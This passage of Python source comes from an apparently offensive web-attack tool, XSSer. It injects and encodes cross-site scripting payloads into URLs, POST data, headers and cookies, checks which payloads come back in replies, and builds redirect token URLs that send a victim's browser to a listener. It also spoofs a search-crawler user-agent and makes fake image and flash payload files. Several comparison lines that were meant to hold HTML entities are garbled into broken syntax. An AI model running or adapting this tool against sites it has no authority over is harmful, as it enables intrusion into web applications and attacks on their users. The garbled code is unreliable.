self.hashed_injections.iteritems(): if str(key) in dest_url: if key not in current_hashes: self.report(" [ " +key+" ] : [" , value + " ]") self.final_hashes[key] = value current_hashes.append(key) else: if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection] b64_string = payload["payload"].split("[B64]") b64_string = b64_string[1] b64_string = b64_string.replace('PAYLOAD', key) b64_string = b64encode(b64_string) b64_string = urllib.urlencode({'':b64_string}) if b64_string.startswith("="): b64_string = b64_string.replace("=", "") if str(b64_string) in str(dest_url): if key not in current_hashes: self.report(" [ " +key+" ] : [" , value + " ]") self.final_hashes[key] = value current_hashes.append(key) else: # when using encoders (Str, Hex, Dec...) payload_string = payload["payload"].replace("PAYLOAD", key) hashed_payload = self.encoding_permutations(payload_string) if self.options.Cem: enc_perm = options.Cem.split(",") for e in enc_perm: hashed_payload = self.encoding_permutations(payload_string) if e == "Str": hashed_payload = hashed_payload.replace(",", "%2C") if e == "Mix": hashed_payload=urllib.quote(hashed_payload) if e == "Dec": hashed_payload = hashed_payload.replace("&#", "%26%23") if e == "Hex": hashed_payload = hashed_payload.replace("%", "%25") if e == "Hes": hashed_payload = hashed_payload.replace("&#", "%26%23") hashed_payload = hashed_payload.replace(";", "%3B") else: if self.options.Str: hashed_payload = hashed_payload.replace(",", "%2C") if self.options.Mix: hashed_payload=urllib.quote(hashed_payload) if self.options.Dec: hashed_payload = hashed_payload.replace("&#", "%26%23") if self.options.Hex: hashed_payload = hashed_payload.replace("%", "%25") if self.options.Hes: hashed_payload = hashed_payload.replace("&#", "%26%23") hashed_payload = hashed_payload.replace(";", "%3B") if str(hashed_payload) in str(dest_url): if key not in current_hashes: self.report(" [ " +key+" ] : [" , value + " ]") self.final_hashes[key] = value if self.extra_hashed_injections: for k, v in self.extra_hashed_injections.iteritems(): payload_url = str(v[1]) if payload_url == payload["payload"]: if k not in current_hashes: self.report(" [ " +k+" ] : [" , v[0] + " ]") self.final_hashes[k] = v[0] current_hashes.append(k) self.report("\n"+"-"*45+"\n") if payload['browser'] == "[Heuristic test]": self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n") else: if self.extra_hashed_injections: extra_attacks=[] if options.xsa: extra_attacks.append("XSA") if options.xsr: extra_attacks.append("XSR") if options.coo: extra_attacks.append("COO") if extra_attacks: extra_attacks = "+ "+ str(extra_attacks) if options.postdata: self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n") else: self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n") else: if options.postdata: self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n") else: self.report("[*] Trying: \n\n" + dest_url.strip() + "\n") if not self.options.hash and not self.options.script: if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo: pass else: self.report("-"*45) if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]": pass else: if not "XSS" in dest_url or not "X1S" in dest_url: if self.options.xsa or self.options.xsr or self.options.coo: pass else: self.report("-"*45) self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n") if not self.options.verbose: self.report("-"*45 + "\n") else: self.report("-"*45) self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n") if not self.options.verbose: self.report("-"*45 + "\n") # statistics injections counters if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]": self.check_positives = self.check_positives + 1 elif payload['browser']=="[Data Control Protocol Injection]": self.dcp_injection = self.dcp_injection + 1 elif payload['browser']=="[Document Object Model Injection]": self.dom_injection = self.dom_injection + 1 elif payload['browser']=="[Induced Injection]": self.httpsr_injection = self.httpsr_injection + 1 elif payload['browser']=="[manual_injection]": self.manual_injection = self.manual_injection + 1 else: self.auto_injection = self.auto_injection +1 if not self.hashed_injections: for k, v in self.extra_hashed_injections.iteritems(): if k in current_hashes: if v[0] == "XSA": agent = v[1] agent = agent.replace("PAYLOAD", k) Curl.agent = agent if v[0] == "XSR": referer = v[1] referer = referer.replace("PAYLOAD", k) Curl.referer = referer if v[0] == "COO": cookie = v[1] cookie = cookie.replace("PAYLOAD", k) Curl.cookie = cookie else: for key, value in self.hashed_injections.iteritems(): for k, v in self.extra_hashed_injections.iteritems(): payload_url = v[1] payload_url = payload_url.replace("PAYLOAD",key) payload_url = payload_url.replace(" ", "+") # black magic! final_dest_url = str(urllib.unquote(dest_url.strip())) if payload_url in final_dest_url: if v[0] == "XSA": agent = v[1] agent = agent.replace("PAYLOAD", k) Curl.agent = agent if v[0] == "XSR": referer = v[1] referer = referer.replace("PAYLOAD", k) Curl.referer = referer if v[0] == "COO": cookie = v[1] cookie = cookie.replace("PAYLOAD", k) Curl.cookie = cookie else: if k in current_hashes: if v[0] == "XSA": agent = v[1] agent = agent.replace("PAYLOAD", k) Curl.agent = agent if v[0] == "XSR": referer = v[1] referer = referer.replace("PAYLOAD", k) Curl.referer = referer if v[0] == "COO": cookie = v[1] cookie = cookie.replace("PAYLOAD", k) Curl.cookie = cookie if options.verbose: self.report("-"*45) self.report("\n[+] HTTP Headers Verbose:\n") self.report(" [Client Request]") Curl.print_options() self.report(" [Server Reply]\n") self.report(curl_handle.info()) self.report("="*45) self.report("[*] Injection(s) Results:") self.report("="*45 + "\n") if payload['browser']=="[Heuristic test]": for key, value in self.final_hashes.iteritems(): if str(key) in dest_url: heuristic_string = key heuristic_param = str(payload['payload']).strip('XSS') # checking heuristic responses if heuristic_string in curl_handle.body(): # ascii if heuristic_param == "\\": self.heuris_backslash_found = self.heuris_backslash_found + 1 # / same as ASCII and Unicode elif heuristic_param == "/": self.heuris_slash_found = self.heuris_slash_found + 1 self.heuris_une_slash_found = self.heuris_une_slash_found + 1 elif heuristic_param == ">": self.heuris_mayor_found = self.heuris_mayor_found + 1 elif heuristic_param == "<": self.heuris_minor_found = self.heuris_minor_found + 1 elif heuristic_param == ";": self.heuris_semicolon_found = self.heuris_semicolon_found + 1 elif heuristic_param == "'": self.heuris_colon_found = self.heuris_colon_found + 1 elif heuristic_param == '"': self.heuris_doublecolon_found = self.heuris_doublecolon_found + 1 elif heuristic_param == "=": self.heuris_equal_found = self.heuris_equal_found + 1 # une elif heuristic_param == "%5C": self.heuris_une_backslash_found = self.heuris_une_backslash_found + 1 elif heuristic_param == "%3E": self.heuris_une_mayor_found = self.heuris_une_mayor_found + 1 elif heuristic_param == "%3C": self.heuris_une_minor_found = self.heuris_une_minor_found + 1 elif heuristic_param == "%3B": self.heuris_une_semicolon_found = self.heuris_une_semicolon_found + 1 elif heuristic_param == "%27": self.heuris_une_colon_found = self.heuris_une_colon_found + 1 elif heuristic_param == "%22": self.heuris_une_doublecolon_found = self.heuris_une_doublecolon_found + 1 elif heuristic_param == "%3D": self.heuris_une_equal_found = self.heuris_une_equal_found + 1 # dec elif heuristic_param == "\": self.heuris_dec_backslash_found = self.heuris_dec_backslash_found + 1 elif heuristic_param == "/": self.heuris_dec_slash_found = self.heuris_dec_slash_found + 1 elif heuristic_param == ">": self.heuris_dec_mayor_found = self.heuris_dec_mayor_found + 1 elif heuristic_param == "<": self.heuris_dec_minor_found = self.heuris_dec_minor_found + 1 elif heuristic_param == ";": self.heuris_dec_semicolon_found = self.heuris_dec_semicolon_found + 1 elif heuristic_param == "'": self.heuris_dec_colon_found = self.heuris_dec_colon_found + 1 elif heuristic_param == """: self.heuris_dec_doublecolon_found = self.heuris_dec_doublecolon_found + 1 elif heuristic_param == "=": self.heuris_dec_equal_found = self.heuris_dec_equal_found + 1 self.add_success(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # success! else: if heuristic_param == "\\": self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1 elif heuristic_param == "/": self.heuris_slash_notfound = self.heuris_slash_notfound + 1 elif heuristic_param == ">": self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1 elif heuristic_param == "<": self.heuris_minor_notfound = self.heuris_minor_notfound + 1 elif heuristic_param == ";": self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1 elif heuristic_param == "'": self.heuris_colon_notfound = self.heuris_colon_notfound + 1 elif heuristic_param == '"': self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1 elif heuristic_param == "=": self.heuris_equal_notfound = self.heuris_equal_notfound + 1 self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail elif self.options.hash: for key, value in self.final_hashes.iteritems(): if str(key) in dest_url: if key in curl_handle.body(): self.add_success(dest_url, key, value, query_string, orig_url, 'hashing check') # success! else: self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail else: for key, value in self.final_hashes.iteritems(): if key in current_hashes: if "XSA" in value: method = "XSA" hashing = key elif "XSR" in value: method = "XSR" hashing = key elif "COO" in value: method = "COO" hashing = key else: method = value hashing = key if not hashing: pass else: if hashing not in dest_url: if key in current_hashes: if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection] b64_string = payload["payload"].split("[B64]") b64_string = b64_string[1] b64_string = b64_string.replace('PAYLOAD', key) b64_string = b64encode(b64_string) b64_string = urllib.urlencode({'':b64_string}) if b64_string.startswith("="): b64_string = b64_string.replace("=", "") if str(b64_string) in str(dest_url): self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle) else: self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle) else: self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle) self.report("") def check_hash_on_target(self, hashing, dest_url, orig_url, payload, query_string, method, curl_handle): options = self.options c_info = str(curl_handle.info()) c_body = str(curl_handle.body()) if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection] b64_string = payload["payload"].split("[B64]") b64_string = b64_string[1] b64_string = b64_string.replace('PAYLOAD', hashing) b64_string = b64encode(b64_string) if b64_string.startswith("="): b64_string = b64_string.replace("=", "") hashing = b64_string if str(hashing) in c_body and "http-code: 200" in c_info: # only add a success if hashing is on body and we have HTTP 200-OK [XSS CHECKPOINT!] # some anti false positives checkers if str(options.discode) in curl_handle.body(): # provided by user self.report("[Info] Reply contains code [ --discode ] provided to be discarded... forcing failure!\n") self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed! else: if str('/>' + hashing) in curl_handle.body() or str('href=' + dest_url + hashing) in curl_handle.body() or str('content=' + dest_url + hashing) in curl_handle.body(): self.report("[Info] Reply looks like a -false positive- from here. Check it, manually... forcing discard!\n") self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed! else: if options.discode: self.report("[Info] Reply does NOT contain code [ --discode ] provided to be discarded... adding! ;-)\n") self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success! else: self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed! def add_failure(self, dest_url, payload, hashing, query_string, orig_url, method='url'): """ Add an attack that failed to inject """ if method == "heuristic": self.report(" [ NOT-FOUND ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]") self.hash_notfound.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url)) elif method == "hashing check": self.report(" [ NOT-FOUND ] -> [ " + str(hashing) + " ] : [ hashing_check ]") self.hash_notfound.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url)) else: self.report(" [ NOT-FOUND ] -> [ " + hashing + " ] : [ " + method + " ]") self.hash_notfound.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url)) def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'): """ Add an attack that managed to inject the code """ if method == "heuristic": self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]") self.hash_found.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url)) elif method == "hashing check": self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]") self.hash_found.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url)) else: payload_sub = payload['payload'] self.report(" [ FOUND! ] -> [ " + hashing + " ] : [ " + method + " ] -> [ " + payload_sub + " ]") self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url)) for reporter in self._reporters: reporter.add_success(dest_url) if self.options.reversecheck: if self.options.dcp or self.options.inducedcode or self.options.dom: pass else: self.do_token_check(orig_url, hashing, payload, query_string, dest_url) def do_token_check(self, orig_url, hashing, payload, query_string, dest_url): self.report("\n" + "="*50) self.report("\n[Info] Trying [ --reverse-check ] from:\n\n"+ orig_url + query_string) if "VECTOR" in orig_url: dest_url = orig_url else: if not dest_url.endswith("/"): dest_url = dest_url + "/" dest_url = orig_url + query_string + payload['payload'] tok_url = None self_url = "http://localhost:19084/success/" + hashing shadow_js_inj = "document.location=document.location.hash.substring(1)" shadow_inj = "" shadow_js_inj = shadow_js_inj dest_url = dest_url.split("#")[0] def requote(what): return urllib.quote_plus(what) vector_and_payload = payload['payload'] _e = self.encoding_permutations if 'XSS' in dest_url: dest_url = dest_url.replace('XSS', vector_and_payload) if 'X1S' in dest_url: dest_url = dest_url.replace('XSS', vector_and_payload) if 'VECTOR' in dest_url: dest_url = dest_url.replace('VECTOR', vector_and_payload) if '">PAYLOAD' in dest_url: tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj)) tok_url += '#' + self_url elif "'>PAYLOAD" in dest_url: tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj)) tok_url += '#' + self_url elif "javascript:PAYLOAD" in dest_url: tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';")) tok_url = dest_url.replace("javascript:PAYLOAD", _e("javascript:" + shadow_js_inj)) tok_url+= '#' + self_url elif '"PAYLOAD"' in dest_url: tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"') elif "'PAYLOAD'" in dest_url: tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'") elif 'PAYLOAD' in dest_url and 'SRC' in dest_url: tok_url = dest_url.replace('PAYLOAD', self_url) elif "SCRIPT" in dest_url: tok_url = dest_url.replace('PAYLOAD', shadow_js_inj) tok_url += '#' + self_url elif 'onerror="PAYLOAD"' in dest_url: tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"')) tok_url+= '#' + self_url elif 'onerror="javascript:PAYLOAD"' in dest_url: tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';")) tok_url = dest_url.replace('onerror="javascript:PAYLOAD"', _e('onerror="javascript:' + shadow_js_inj + '"')) tok_url+= '#' + self_url elif '' in dest_url: tok_url = dest_url.replace("", _e(shadow_inj)) tok_url+= '#' + self_url elif 'PAYLOAD' in dest_url: tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj)) tok_url+= '#' + self_url elif 'href' in dest_url and 'PAYLOAD' in dest_url: tok_url = dest_url.replace('PAYLOAD', self_url) elif 'HREF' in dest_url and 'PAYLOAD' in dest_url: tok_url = dest_url.replace('PAYLOAD', self_url) elif 'url' in dest_url and 'PAYLOAD' in dest_url: tok_url = dest_url.replace('PAYLOAD', self_url) self.final_attacks[hashing] = {'url': tok_url} if tok_url: try: if self.options.reverseopen: self.report("\n" + "-"*25+"\n") self.report("[Info] Launching web browser (default) with a 'token' url...") self._webbrowser.open(tok_url) except: pass def _report_attack_failure(self, curl_handle, dest_url, payload,\ query_string, orig_url): """ report connection failure of an attack """ options = self.options current_hashes = [] # to check for ongoing hashes if payload['browser'] == "[Heuristic test]": for key, value in self.hashed_injections.iteritems(): if key not in current_hashes: self.final_hashes[key] = value current_hashes.append(key) elif self.options.hash: for key, value in self.hashed_injections.iteritems(): self.final_hashes[key] = value current_hashes.append(key) else: self.report("-"*45) self.report("\n[!] Hashing: \n") for key, value in self.hashed_injections.iteritems(): if str(key) in str(dest_url): # GET if key not in current_hashes: self.report(" [ " +key+" ] : [" , value + " ]") self.final_hashes[key] = value current_hashes.append(key) else: if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection] b64_string = payload["payload"].split("[B64]") b64_string = b64_string[1] b64_string = b64_string.replace('PAYLOAD', key) b64_string = b64encode(b64_string) b64_string = urllib.urlencode({'':b64_string}) if b64_string.startswith("="): b64_string = b64_string.replace("=", "") if str(b64_string) in str(dest_url): if key not in current_hashes: self.report(" [ " +key+" ] : [" , value + " ]") self.final_hashes[key] = value current_hashes.append(key) else: # when using encoders (Str, Hex, Dec...) payload_string = payload["payload"].replace("PAYLOAD", key) hashed_payload = self.encoding_permutations(payload_string) if self.options.Cem: enc_perm = options.Cem.split(",") for e in enc_perm: hashed_payload = self.encoding_permutations(payload_string) if e == "Str": hashed_payload = hashed_payload.replace(",", "%2C") if e == "Mix": hashed_payload=urllib.quote(hashed_payload) if e == "Dec": hashed_payload = hashed_payload.replace("&#", "%26%23") if e == "Hex": hashed_payload = hashed_payload.replace("%", "%25") if e == "Hes": hashed_payload = hashed_payload.replace("&#", "%26%23") hashed_payload = hashed_payload.replace(";", "%3B") else: if self.options.Str: hashed_payload = hashed_payload.replace(",", "%2C") if self.options.Mix: hashed_payload=urllib.quote(hashed_payload) if self.options.Dec: hashed_payload = hashed_payload.replace("&#", "%26%23") if self.options.Hex: hashed_payload = hashed_payload.replace("%", "%25") if self.options.Hes: hashed_payload = hashed_payload.replace("&#", "%26%23") hashed_payload = hashed_payload.replace(";", "%3B") if str(hashed_payload) in str(dest_url): if key not in current_hashes: self.report(" [ " +key+" ] : [" , value + " ]") self.final_hashes[key] = value current_hashes.append(key) if self.extra_hashed_injections: for k, v in self.extra_hashed_injections.iteritems(): payload_url = str(v[1]) if payload_url == payload["payload"]: if k not in current_hashes: self.report(" [ " +k+" ] : [" , v[0] + " ]") self.final_hashes[k] = v[0] current_hashes.append(k) self.report("\n"+"-"*45+"\n") if payload['browser'] == "[Heuristic test]": self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n") else: if self.extra_hashed_injections: extra_attacks=[] if options.xsa: extra_attacks.append("XSA") if options.xsr: extra_attacks.append("XSR") if options.coo: extra_attacks.append("COO") if extra_attacks: extra_attacks = "+ "+ str(extra_attacks) if options.postdata: self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n") else: self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n") else: if options.postdata: self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n") else: self.report("[*] Trying: \n\n" + dest_url.strip()+"\n") if not self.options.hash and not self.options.script: if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo: pass else: self.report("-"*45) if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]": pass else: if not "XSS" in dest_url or not "X1S" in dest_url: if self.options.xsa or self.options.xsr or self.options.coo: pass else: self.report("-"*45) self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n") if not self.options.verbose: self.report("-"*45 + "\n") else: self.report("-"*45) self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n") if not self.options.verbose: self.report("-"*45 + "\n") # statistics injections counters if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]": self.check_positives = self.check_positives + 1 elif payload['browser']=="[Data Control Protocol Injection]": self.dcp_injection = self.dcp_injection + 1 elif payload['browser']=="[Document Object Model Injection]": self.dom_injection = self.dom_injection + 1 elif payload['browser']=="[Induced Injection]": self.httpsr_injection = self.httpsr_injection + 1 elif payload['browser']=="[manual_injection]": self.manual_injection = self.manual_injection + 1 else: self.auto_injection = self.auto_injection +1 if not self.hashed_injections: for k, v in self.extra_hashed_injections.iteritems(): if k in current_hashes: if v[0] == "XSA": agent = v[1] agent = agent.replace("PAYLOAD", k) Curl.agent = agent if v[0] == "XSR": referer = v[1] referer = referer.replace("PAYLOAD", k) Curl.referer = referer if v[0] == "COO": cookie = v[1] cookie = cookie.replace("PAYLOAD", k) Curl.cookie = cookie else: for key, value in self.hashed_injections.iteritems(): for k, v in self.extra_hashed_injections.iteritems(): payload_url = v[1] payload_url = payload_url.replace("PAYLOAD",key) payload_url = payload_url.replace(" ", "+") # black magic! final_dest_url = str(urllib.unquote(dest_url.strip())) if payload_url in final_dest_url: if v[0] == "XSA": agent = v[1] agent = agent.replace("PAYLOAD", k) Curl.agent = agent if v[0] == "XSR": referer = v[1] referer = referer.replace("PAYLOAD", k) Curl.referer = referer if v[0] == "COO": cookie = v[1] cookie = cookie.replace("PAYLOAD", k) Curl.cookie = cookie else: if k in current_hashes: if v[0] == "XSA": agent = v[1] agent = agent.replace("PAYLOAD", k) Curl.agent = agent if v[0] == "XSR": referer = v[1] referer = referer.replace("PAYLOAD", k) Curl.referer = referer if v[0] == "COO": cookie = v[1] cookie = cookie.replace("PAYLOAD", k) Curl.cookie = cookie if options.verbose: self.report("-"*45) self.report("\n[+] HTTP Headers Verbose:\n") self.report(" [Client Request]") Curl.print_options() self.report(" [Server Reply]\n") self.report(curl_handle.info()) self.report("="*45) self.report("[*] Injection(s) Results:") self.report("="*45 + "\n") if payload['browser']=="[Heuristic test]": for key, value in self.final_hashes.iteritems(): if str(key) in dest_url: heuristic_string = key heuristic_param = str(payload['payload']).strip('XSS') if heuristic_param == "\\": self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1 elif heuristic_param == "/": self.heuris_slash_notfound = self.heuris_slash_notfound + 1 elif heuristic_param == ">": self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1 elif heuristic_param == "<": self.heuris_minor_notfound = self.heuris_minor_notfound + 1 elif heuristic_param == ";": self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1 elif heuristic_param == "'": self.heuris_colon_notfound = self.heuris_colon_notfound + 1 elif heuristic_param == '"': self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1 elif heuristic_param == "=": self.heuris_equal_notfound = self.heuris_equal_notfound + 1 self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail elif self.options.hash: for key, value in self.final_hashes.iteritems(): self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail self.report("\n" +"="*45) else: for key, value in self.final_hashes.iteritems(): if "XSA" in value: method = "xsa" hashing = key elif "XSR" in value: method = "xsr" hashing = key elif "COO" in value: method = "coo" hashing = key else: method = "url" hashing = key if self.options.Str: payload_string = payload["payload"].replace("PAYLOAD", key) hashed_payload = self.encoding_permutations(payload_string) hashed_payload = hashed_payload.replace(",", "%2C") if str(hashed_payload) in str(dest_url): self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed! elif self.options.Mix: payload_string = payload["payload"].replace("PAYLOAD", key) hashed_payload = self.encoding_permutations(payload_string) hashed_payload=urllib.quote(hashed_payload) if str(hashed_payload) in str(dest_url): self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed! elif self.options.Dec: payload_string = payload["payload"].replace("PAYLOAD", key) hashed_payload = self.encoding_permutations(payload_string) hashed_payload = hashed_payload.replace("&#", "%26%23") if str(hashed_payload) in str(dest_url): self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed! elif self.options.Hex: payload_string = payload["payload"].replace("PAYLOAD", key) hashed_payload = self.encoding_permutations(payload_string) hashed_payload = hashed_payload.replace("%", "%25") if str(hashed_payload) in str(dest_url): self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed! elif self.options.Hes: payload_string = payload["payload"].replace("PAYLOAD", key) hashed_payload = self.encoding_permutations(payload_string) hashed_payload = hashed_payload.replace("&#", "%26%23") hashed_payload = hashed_payload.replace(";", "%3B") if str(hashed_payload) in str(dest_url): self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed! else: if self.options.Cem: enc_perm = options.Cem.split(",") payload_string = payload["payload"].replace("PAYLOAD", key) for e in enc_perm: hashed_payload = self.encoding_permutations(payload_string) if str(e) == "Str": hashed_payload = hashed_payload.replace(",", "%2C") if e == "Mix": hashed_payload=urllib.quote(hashed_payload) if e == "Dec": hashed_payload = hashed_payload.replace("&#", "%26%23") if e == "Hex": hashed_payload = hashed_payload.replace("%", "%25") if e == "Hes": hashed_payload = hashed_payload.replace("&#", "%26%23") hashed_payload = hashed_payload.replace(";", "%3B") if str(hashed_payload) in str(dest_url): self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed! else: if str(key) in str(dest_url): self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed! else: if key in current_hashes: if method == "xsa": self.add_failure(dest_url, payload, key, query_string, orig_url, "XSA") # failed! elif method == "xsr": self.add_failure(dest_url, payload, key, query_string, orig_url, "XSR") # failed! elif method == "coo": self.add_failure(dest_url, payload, key, query_string, orig_url, "COO") # failed! self.report("\n" +"="*45) if str(curl_handle.info()["http-code"]) == "404": self.report("\n[Error] 404 Not Found: The server has not found anything matching the Request-URI\n") elif str(curl_handle.info()["http-code"]) == "403": self.report("\n[Error] 403 Forbidden: The server understood the request, but is refusing to fulfill it\n") elif str(curl_handle.info()["http-code"]) == "400": self.report("\n[Error] 400 Bad Request: The request could not be understood by the server due to malformed syntax\n") elif str(curl_handle.info()["http-code"]) == "401": self.report("\n[Error] 401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are typed correctly\n") elif str(curl_handle.info()["http-code"]) == "407": self.report("\n[Error] 407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n") elif str(curl_handle.info()["http-code"]) == "408": self.report("\n[Error] 408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n") elif str(curl_handle.info()["http-code"]) == "500": self.report("\n[Error] 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n") elif str(curl_handle.info()["http-code"]) == "501": self.report("\n[Error] 501 Not Implemented: The server does not support the functionality required to fulfill the request\n") elif str(curl_handle.info()["http-code"]) == "502": self.report("\n[Error] 502 Bad Gateway: The server received an invalid response from the upstream server\n") elif str(curl_handle.info()["http-code"]) == "503": self.report("\n[Error] 503 Service Unavailable: The server is currently unable to handle the request [OFFLINE!]\n") elif str(curl_handle.info()["http-code"]) == "504": self.report("\n[Error] 504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n") elif str(curl_handle.info()["http-code"]) == "0": self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n") else: self.report("\n[Error] Not injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")\n") if str(curl_handle.info()["http-code"]) == "404": self.not_connection = self.not_connection + 1 elif str(curl_handle.info()["http-code"]) == "503": self.forwarded_connection = self.forwarded_connection + 1 else: self.other_connection = self.other_connection + 1 def check_positive(self, curl_handle, dest_url, payload, query_string): """ Perform extra check for positives """ body = curl_handle.body() pass def create_options(self, args=None): """ Create options for OptionParser. """ self.optionParser = XSSerOptions() self.options = self.optionParser.get_options(args) if not self.options: return False return self.options def _get_attack_urls(self): """ Process payload options and make up the payload list for the attack. """ urls = [] options = self.options p = self.optionParser if options.imx: self.create_fake_image(options.imx, options.script) return [] if options.flash: self.create_fake_flash(options.flash, options.script) return [] if options.update: self.report('='*75) self.report(str(p.version)) self.report('='*75) try: print("\nTrying to update to the latest stable version...\n") Updater() except: print("\nSomething was wrong!. You should clone XSSer manually with:\n") print("$ git clone https://code.03c8.net/epsylon/xsser\n") print "\nAlso you can try this other mirror:\n" print "$ git clone https://github.com/epsylon/xsser\n" return [] if options.wizard: # processing wizard template if self.user_template is not None: self.options.statistics = True # detailed output if self.user_template[0] == "DORKING": # mass-dorking self.options.dork_file = True self.options.dork_mass = True elif "http" in self.user_template[0]: # from target url self.options.url = self.user_template[0] else: # from file self.options.readfile = self.user_template[0] if self.user_template[1] == "CRAWLER": # crawlering target self.options.crawling = "10" else: # manual payload (GET or POST) if self.user_template_conntype == "GET": self.options.getdata = self.user_template[1] else: self.options.postdata = self.user_template[1] if self.user_template[2] == "Proxy: No - Spoofing: Yes": self.options.ignoreproxy = True self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent self.options.referer = "" # spoof referer elif self.user_template[2] == "Proxy: No - Spoofing: No": self.options.ignoreproxy = True else: # using proxy + spoofing self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent self.options.referer = "" # spoof referer if self.user_template[2] is not None: self.options.proxy = self.user_template[2] else: self.options.ignoreproxy = True if self.user_template[3] == "Not using encoders": pass elif self.user_template[3] == "Hex": # Hexadecimal self.options.Hex = True elif self.user_template[3] == "Str+Une": # StringFromCharCode()+Unescape() self.options.Str = True self.options.Une = True else: # Character encoding mutations self.options.Cem = self.user_template[3] if self.user_template[4] == "Alertbox": # Classic AlertBox injection self.options.finalpayload = "" else: if self.user_template[4] is not None: # Inject user script self.options.finalpayload = self.user_template[4] else: # not final injection pass else: # exit return if options.target: # miau! self.report('='*75) self.report(str(p.version)) self.report('='*75) self.report("Testing [Full XSS audit]... ;-)") self.report('='*75) self.report("\n[Info] The following actions will be performed at the end:\n") self.report(" 1- Output with detailed statistics\n") self.report(" 2- Export results to files: \n\n - a) XSSreport.raw \n - b) XSSer__.xml\n") self.options.crawling = "99999" # set max num of urls to crawl self.options.crawler_width = "5" # set max num of deeping levels self.options.statistics = True # detailed output self.options.timeout = "60" # timeout self.options.retries = "2" # retries self.options.delay = "5" # delay self.options.threads = "10" # threads self.options.followred = True # follow redirs self.options.nohead = False # HEAD check self.options.reversecheck = True # try to establish a reverse connection 